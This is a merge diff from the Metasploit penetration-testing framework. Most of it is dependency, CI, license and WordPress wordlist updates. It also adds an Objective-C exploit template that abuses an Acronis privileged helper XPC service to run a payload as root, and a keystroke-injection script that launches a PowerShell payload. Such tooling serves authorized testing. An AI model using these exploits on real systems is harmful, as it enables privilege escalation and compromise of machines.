Land #17409 , rhost walker handle interupt signal

automatic module_metadata_base.json update
Land #17416 , Use .blank? instead of .empty? when handling SSH Key details to prevent crashes
2022-12-28 14:46:13 -05:00 · 2022-12-27 20:48:57 -06:00 · 2022-12-27 20:24:54 -06:00 · 2022-12-27 19:31:49 -06:00 · 2022-12-27 18:18:24 -06:00 · 2022-12-27 15:15:14 -06:00
216 changed files with 58961 additions and 2413 deletions
@@ -64,18 +64,18 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
-          - 3.0
-          - 3.1
+          - '2.7'
+          - '3.0'
+          - '3.1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        exclude:
-          - { os: ubuntu-latest, ruby: 2.7 }
-          - { os: ubuntu-latest, ruby: 3.0 }
+          - { os: ubuntu-latest, ruby: '2.7' }
+          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: 3.1
+            ruby: '3.1'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -100,7 +100,7 @@ jobs:
          BUNDLE_WITHOUT: "coverage development pcap"
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true

      - name: Create database
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,4 +1,4 @@
-FROM ruby:3.0.4-alpine3.15 AS builder
+FROM ruby:3.0.5-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -43,13 +43,13 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
+    tar -zxf go1.19.3.src.tar.gz && \
+    rm go1.19.3.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.4-alpine3.15
+FROM ruby:3.0.5-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.26)
+    metasploit-framework (6.2.33)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -11,7 +11,6 @@ PATH
      bcrypt
      bcrypt_pbkdf
      bson
-      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
      em-http-request
@@ -30,7 +29,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.99)
+      metasploit-payloads (= 2.0.105)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -128,40 +127,40 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.648.0)
-    aws-sdk-core (3.162.0)
+    aws-partitions (1.671.0)
+    aws-sdk-core (3.168.3)
      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
+      aws-partitions (~> 1, >= 1.651.0)
+      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.341.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2 (1.354.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.71.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-iam (1.73.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.58.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-kms (1.60.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.115.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-s3 (1.117.2)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
    aws-sigv4 (1.5.2)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.13)
+    bindata (2.4.14)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
-    concurrent-ruby (1.0.5)
+    concurrent-ruby (1.1.10)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.6.2)
-      irb (>= 1.3.6)
+    debug (1.7.0)
+      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
    dnsruby (1.61.9)
@@ -185,12 +184,12 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.23.0)
+    faker (3.0.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.6.0)
+    faraday (2.7.1)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (3.0.1)
+    faraday-net_http (3.0.2)
    faraday-retry (2.0.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
@@ -216,12 +215,12 @@ GEM
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.4.2)
+    irb (1.6.1)
      reline (>= 0.3.0)
-    jmespath (1.6.1)
+    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.2)
+    json (2.6.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
@@ -229,13 +228,13 @@ GEM
    loofah (2.19.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
+    memory_profiler (1.0.1)
    metasm (1.0.5)
    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.9)
+    metasploit-credential (6.0.1)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -249,8 +248,8 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.99)
-    metasploit_data_models (5.0.5)
+    metasploit-payloads (2.0.105)
+    metasploit_data_models (5.0.6)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
      arel-helpers
@@ -258,7 +257,7 @@ GEM
      metasploit-model (>= 3.1)
      pg
      railties (~> 6.0)
-      recog (~> 2.0)
+      recog
      webrick
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
@@ -271,15 +270,15 @@ GEM
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
-    net-protocol (0.1.3)
+    net-protocol (0.2.0)
      timeout
-    net-smtp (0.3.2)
+    net-smtp (0.3.3)
      net-protocol
    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.9)
+    nokogiri (1.13.10)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -292,17 +291,17 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.1)
+    parser (3.1.3.0)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
+    pdf-reader (2.11.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.4)
+    pg (1.4.5)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -312,9 +311,9 @@ GEM
    public_suffix (5.0.0)
    puma (6.0.0)
      nio4r (~> 2.0)
-    racc (1.6.0)
+    racc (1.6.1)
    rack (2.2.4)
-    rack-protection (3.0.2)
+    rack-protection (3.0.4)
      rack
    rack-test (2.0.2)
      rack (>= 1.3)
@@ -332,10 +331,10 @@ GEM
    rainbow (3.1.1)
    rake (13.0.6)
    rb-readline (0.5.5)
-    recog (2.3.23)
+    recog (3.0.3)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.6.0)
+    regexp_parser (2.6.1)
    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -383,23 +382,23 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.46)
+    rex-text (0.2.47)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.1)
+    rspec (3.12.0)
+      rspec-core (~> 3.12.0)
+      rspec-expectations (~> 3.12.0)
+      rspec-mocks (~> 3.12.0)
+    rspec-core (3.12.0)
+      rspec-support (~> 3.12.0)
+    rspec-expectations (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.12.0)
+    rspec-mocks (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
+      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
@@ -410,25 +409,25 @@ GEM
      rspec-support (~> 3.11)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.1)
-    rubocop (1.37.0)
+    rspec-support (3.12.0)
+    rubocop (1.39.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.22.0, < 2.0)
+      rubocop-ast (>= 1.23.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.22.0)
+    rubocop-ast (1.24.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.0)
+    ruby_smb (3.2.1)
      bindata
      openssl-ccm
      openssl-cmac
@@ -445,12 +444,12 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.2)
+    sinatra (3.0.4)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.2)
+      rack-protection (= 3.0.4)
      tilt (~> 2.0)
-    sqlite3 (1.5.3)
+    sqlite3 (1.5.4)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
@@ -460,12 +459,12 @@ GEM
      rack (>= 1, < 3)
    thor (1.2.1)
    tilt (2.0.11)
-    timecop (0.9.5)
-    timeout (0.3.0)
+    timecop (0.9.6)
+    timeout (0.3.1)
    ttfunk (1.7.0)
    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.5)
+    tzinfo-data (1.2022.7)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
@@ -496,7 +495,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.1)
+    zeitwerk (2.6.6)

 PLATFORMS
  ruby
@@ -15,40 +15,61 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/headers/windows/c_payload_util/beacon.h
-Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
-License: Apache 2.0
-
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1

-Files: data/templates/to_mem_pshreflection.ps1.template
-Copyright: 2012, Matthew Graeber
-License: BSD-3-clause
+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0

-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
+Files: data/post/SharpHound.exe data/post/powershell/SharpHound.ps1
+Copyright (C) 2016-2022 Specter Ops Inc.
+License: GNU GPL 3.0
+Purpose: These files are uploaded and executed by post/windows/gather/bloodhound.
+
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

+Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
+Copyright: 2020 Johnny Shaw
+License: MIT
+
+Files: exteneral/source/exploits/CVE-2022-26904/*
+Copywrite: 2022 Abdelhamid Naceri
+License: MIT
+
+Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
+Copyright: 2011 Jon Bringhurst
+License: GNU GPL 2.0
+
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+
 Files: external/source/ipwn/*
 Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic

-Files: external/source/ReflectiveDLLInjection/*
-Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-License: BSD-3-clause
-
 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause

+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+License: BSD-3-clause
+
 Files: external/source/tightvnc/*
 Copyright: 1999 AT&T Laboratories Cambridge.
           2000 Tridia Corp.
@@ -71,6 +92,10 @@ Copyright: 1999 AT&T Laboratories Cambridge.
           2000-2009 TightVNC Group
 License: GPL-2

+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
@@ -83,6 +108,10 @@ Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

+Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
+Copyright: Copyright 2018 SmartBear Software
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby
@@ -115,30 +144,6 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

-Files: data/webcam/api.js
-Copyright: Copyright 2013 Muaz Khan<@muazkh>.
-License: MIT
-
-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
-
-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
-
-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
-License: MIT
-
-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copywrite: 2022 Abdelhamid Naceri
-License: MIT
-
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -10,26 +10,26 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.648.0, "Apache 2.0"
-aws-sdk-core, 3.162.0, "Apache 2.0"
-aws-sdk-ec2, 1.341.0, "Apache 2.0"
-aws-sdk-iam, 1.71.0, "Apache 2.0"
-aws-sdk-kms, 1.58.0, "Apache 2.0"
-aws-sdk-s3, 1.115.0, "Apache 2.0"
+aws-partitions, 1.671.0, "Apache 2.0"
+aws-sdk-core, 3.168.3, "Apache 2.0"
+aws-sdk-ec2, 1.354.0, "Apache 2.0"
+aws-sdk-iam, 1.73.0, "Apache 2.0"
+aws-sdk-kms, 1.60.0, "Apache 2.0"
+aws-sdk-s3, 1.117.2, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.13, ruby
+bindata, 2.4.14, ruby
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.0.5, MIT
+concurrent-ruby, 1.1.10, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.6.2, "ruby, Simplified BSD"
+debug, 1.7.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
@@ -41,9 +41,9 @@ erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.23.0, MIT
-faraday, 2.6.0, MIT
-faraday-net_http, 3.0.1, MIT
+faker, 3.0.0, MIT
+faraday, 2.7.1, MIT
+faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
@@ -59,21 +59,21 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.4.2, "ruby, Simplified BSD"
-jmespath, 1.6.1, "Apache 2.0"
+irb, 1.6.1, "ruby, Simplified BSD"
+jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.2, ruby
+json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
 loofah, 2.19.0, MIT
-memory_profiler, 1.0.0, MIT
+memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 5.0.9, "New BSD"
-metasploit-framework, 6.2.26, "New BSD"
+metasploit-credential, 6.0.1, "New BSD"
+metasploit-framework, 6.2.33, "New BSD"
 metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.99, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.5, "New BSD"
+metasploit-payloads, 2.0.105, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 5.0.6, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
@@ -84,13 +84,13 @@ multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ldap, 0.17.1, MIT
-net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.2, "ruby, Simplified BSD"
+net-protocol, 0.2.0, "ruby, Simplified BSD"
+net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.9, MIT
+nokogiri, 1.13.10, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,18 +98,18 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.1, MIT
+parser, 3.1.3.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.10.0, MIT
-pg, 1.4.4, "Simplified BSD"
+pdf-reader, 2.11.0, MIT
+pg, 1.4.5, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
 public_suffix, 5.0.0, MIT
 puma, 6.0.0, "New BSD"
-racc, 1.6.0, "ruby, Simplified BSD"
+racc, 1.6.1, "ruby, Simplified BSD"
 rack, 2.2.4, MIT
-rack-protection, 3.0.2, MIT
+rack-protection, 3.0.4, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.4.3, MIT
@@ -117,9 +117,9 @@ railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.23, unknown
+recog, 3.0.3, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.6.0, MIT
+regexp_parser, 2.6.1, MIT
 reline, 0.3.1, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
@@ -137,43 +137,43 @@ rex-rop_builder, 0.1.4, "New BSD"
 rex-socket, 0.1.43, "New BSD"
 rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.46, "New BSD"
+rex-text, 0.2.47, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.11.0, MIT
-rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.1, MIT
-rspec-mocks, 3.11.1, MIT
+rspec, 3.12.0, MIT
+rspec-core, 3.12.0, MIT
+rspec-expectations, 3.12.0, MIT
+rspec-mocks, 3.12.0, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.1, MIT
-rubocop, 1.37.0, MIT
-rubocop-ast, 1.22.0, MIT
+rspec-support, 3.12.0, MIT
+rubocop, 1.39.0, MIT
+rubocop-ast, 1.24.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.0, "New BSD"
+ruby_smb, 3.2.1, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.2, MIT
-sqlite3, 1.5.3, "New BSD"
+sinatra, 3.0.4, MIT
+sqlite3, 1.5.4, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
 tilt, 2.0.11, MIT
-timecop, 0.9.5, MIT
-timeout, 0.3.0, "ruby, Simplified BSD"
+timecop, 0.9.6, MIT
+timeout, 0.3.1, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.5, MIT
-tzinfo-data, 1.2022.5, MIT
+tzinfo-data, 1.2022.7, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.3.0, MIT
@@ -188,4 +188,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.6.1, MIT
+zeitwerk, 2.6.6, MIT
@@ -0,0 +1,46 @@
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"<%= @payload_path %>";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -71,6 +71,8 @@
                        <B N="V"><%= arg[:value].to_s %></B>
                        <% elsif arg[:value].is_a? String %>
                        <S N="V"><%= arg[:value].encode(xml: :text) %></S>
+                        <% elsif arg[:value].is_a? Nokogiri::XML::Element %>
+                        <%= arg[:value].to_s %>
                        <% end %>
                      </MS>
                    </Obj>
@@ -8,7 +8,7 @@
  </soap:Header>
  <soap:Body>
    <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
-      <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
+      <m:UnresolvedEntry><%= name %></m:UnresolvedEntry>
    </m:ResolveNames>
  </soap:Body>
 </soap:Envelope>
@@ -0,0 +1,14 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
+DELAY 750
+ENTER
@@ -54,4 +54,5 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
-elementor
+elementor
+bookingpress
@@ -168,17 +168,21 @@ aanews
 aanglo
 aapna
 aarambha-blogger
+aarambha-real-estate
 aargee
 aari
 aaron
 aaron-modified-intent
 aartus
+aasta
+aasta-light
 aav1
 aazeen
 ab
 ab-folio
 abacus
 abacus-hotel
+abadir
 abalane
 abaris
 abaya
@@ -204,6 +208,8 @@ abingle
 abiolian-business
 abisteel
 abitno
+ablanka
+ablanna
 able
 abletone
 ablog
@@ -239,6 +245,7 @@ abythens
 ac-board
 ac-care
 ac-repair
+ac-repair-services
 academic
 academic-clear
 academic-education
@@ -289,6 +296,8 @@ accountant-child
 accountantlaw
 accountants-theme
 accounting
+accounting-techup
+accountra
 accssesspress-stdasore
 ace
 ace-blog
@@ -312,6 +321,7 @@ acommerce
 acool
 acosminblogger
 acoustics
+across
 act-child
 act-theme-lite
 actify
@@ -396,6 +406,9 @@ adney
 adonis
 adorable-blog
 adoration
+adore-blog
+adore-business
+adore-news
 adri
 adrian-lite
 adrielly-saponi
@@ -414,17 +427,20 @@ advance-blog
 advance-blogging
 advance-business
 advance-coaching
+advance-consultancy
 advance-ecommerce-store
 advance-ecommerce-store1
 advance-education
 advance-fitness-gym
 advance-it-company
+advance-marketing-agency
 advance-one-page
 advance-pet-care
 advance-portfolio
 advance-portfolio-0-1
 advance-simple-blue
 advance-startup
+advance-techup
 advance1-fitness-gym
 advantage
 advent
@@ -442,6 +458,8 @@ adventure-travel
 adventure-travelling
 adventurous
 advertica-lite
+advertising-techup
+advertisingly-blog
 advik-blog-lite
 adviso
 advisory
@@ -457,7 +475,9 @@ aemi
 aemi-child
 aemon
 aeonaccess
+aeonblock
 aeonblog
+aeonium
 aeonmag
 aera
 aereo
@@ -481,8 +501,10 @@ affiliate-booster
 affiliate-booster-sk
 affiliate-marketingly
 affiliate-newspaperly
+affiliate-review
 affiliateblogwriter
 affiliates-bloglet
+affiliatex
 affilicious-theme
 affilistrap
 affilivice
@@ -518,6 +540,9 @@ agency-x
 agency-zita
 agencyup
 agencyup-dark
+agencywp
+agencyx
+agencyx-blog
 agensy
 aggiornare
 agile-spirit
@@ -526,9 +551,12 @@ agility-wp
 agindo
 agiva
 aglee-lite
+agnar
 agncy
 agni
 agri-lite
+agriculture-farm
+agriculture-farming
 agroamerica
 agronomics-lite
 aguafuerte
@@ -556,6 +584,7 @@ airi-patricia
 airi1
 airiteste
 airiwachswachs
+airl
